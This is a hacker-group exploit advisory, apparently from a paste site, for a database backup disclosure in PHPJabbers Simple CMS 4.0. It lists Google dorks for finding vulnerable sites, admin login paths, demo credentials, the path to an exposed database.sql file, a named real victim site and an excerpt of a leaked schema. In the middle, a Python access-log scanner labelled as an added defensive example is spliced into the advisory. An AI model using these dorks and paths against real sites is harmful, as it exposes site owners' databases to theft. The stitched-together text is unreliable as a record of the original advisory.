KingSkrupellos

Simple CMS PHPJabbers Stivasoft 4.0 Database Disclosure

Dec 16th, 2018
#################################################################################################

# Exploit Title : Simple CMS PHPJabbers Stivasoft 4.0 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 17/12/2018
# Vendor Homepage : phpjabbers.com ~ stivasoft.com ~ racingriverwebs.com
# Software Download Link : phpjabbers.com/simple-cms/
# Demo Software : demo.phpjabbers.com/1544995520_332/index.php?controller=pjAdminSections&action=pjActionIndex
+ Login Details => Email: [email protected] Password: pass
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 4.0
# Exploit Risk : Medium
# Google Dorks : intext:''PHP Scripts Copyright © 2018 StivaSoft Ltd''
+ intext:''Hotel Booking script by PHPJabbers.com -
+ intext:''© Copyright Dravis Interests 2003-2018 Website by Racing River Website Solutions''
+ intext:''Website by Racing River Website Solutions''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/scms4/index.php?controller=Admin&action=login

# CPanel Login Path :

p3plcpnl0800.prod.phx3.secureserver.net:2083

# Exploit :

/scms4/app/config/database.sql

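As an added defender-side example (not part of the original advisory): a small check that scans Apache/nginx combined-format access logs for requests to the dump path named above and to generic dump/backup suffixes, treating a 2xx response as confirmed exposure and any other status as a blocked probe. The log lines are constructed samples using documentation IP addresses.

```python
import re
from dataclasses import dataclass

# Regex for the Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Paths that must never be served from the web root: the Simple CMS 4.0
# database dump named in the advisory, plus common dump/backup suffixes.
SENSITIVE_PATH_RE = re.compile(
    r'/app/config/database\.sql$|\.(sql|sql\.gz|bak|old)$', re.IGNORECASE
)

@dataclass
class Finding:
    ip: str
    path: str
    status: int
    severity: str  # "exposed" (served with 2xx) or "probe" (request blocked)

def analyse_access_log(lines):
    """Return one Finding per request for a sensitive path."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        path = m.group("path").split("?", 1)[0]  # drop the query string
        if not SENSITIVE_PATH_RE.search(path):
            continue
        status = int(m.group("status"))
        severity = "exposed" if 200 <= status < 300 else "probe"
        findings.append(Finding(m.group("ip"), path, status, severity))
    return findings

# Constructed sample lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Dec/2018:10:01:02 +0000] "GET /scms4/app/config/database.sql HTTP/1.1" 200 18234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Dec/2018:10:01:05 +0000] "GET /scms4/index.php?controller=Admin&action=login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [17/Dec/2018:10:02:30 +0000] "GET /backup.sql.gz HTTP/1.1" 404 196 "-" "curl/7.61"',
    '198.51.100.9 - - [17/Dec/2018:10:02:31 +0000] "GET /scms4/app/config/database.sql HTTP/1.1" 403 199 "-" "curl/7.61"',
]

if __name__ == "__main__":
    for f in analyse_access_log(SAMPLE_LOG):
        print(f"{f.severity:8s} {f.ip:15s} {f.status} {f.path}")
```

An "exposed" finding means the dump was actually served; the fix is to move it out of the document root (or delete it) and deny `.sql` and similar suffixes at the web server so future copies cannot leak.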
#################################################################################################

# Example SQL Dump Information => dravisinterests.com

DROP TABLE IF EXISTS `simple_cms_files`;
CREATE TABLE IF NOT EXISTS `simple_cms_files` (

DROP TABLE IF EXISTS `simple_cms_roles`;
CREATE TABLE IF NOT EXISTS `simple_cms_roles` (

DROP TABLE IF EXISTS `simple_cms_sections`;
CREATE TABLE IF NOT EXISTS `simple_cms_sections` (

DROP TABLE IF EXISTS `simple_cms_users`;
CREATE TABLE IF NOT EXISTS `simple_cms_users` (

DROP TABLE IF EXISTS `simple_cms_users_files`;
CREATE TABLE IF NOT EXISTS `simple_cms_users_files` (

DROP TABLE IF EXISTS `simple_cms_users_sections`;
CREATE TABLE IF NOT EXISTS `simple_cms_users_sections` (

DROP TABLE IF EXISTS `simple_cms_options`;
CREATE TABLE IF NOT EXISTS `simple_cms_options` (

INSERT INTO `simple_cms_roles` (`id`, `role`, `status`) VALUES
(1, 'admin', 'T'),
(2, 'editor', 'T');

#################################################################################################

# Example Vulnerable Site =>

[+] dravisinterests.com/scms4/app/config/database.sql => [ Proof of Concept for Vuln ] => archive.is/43J4N

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################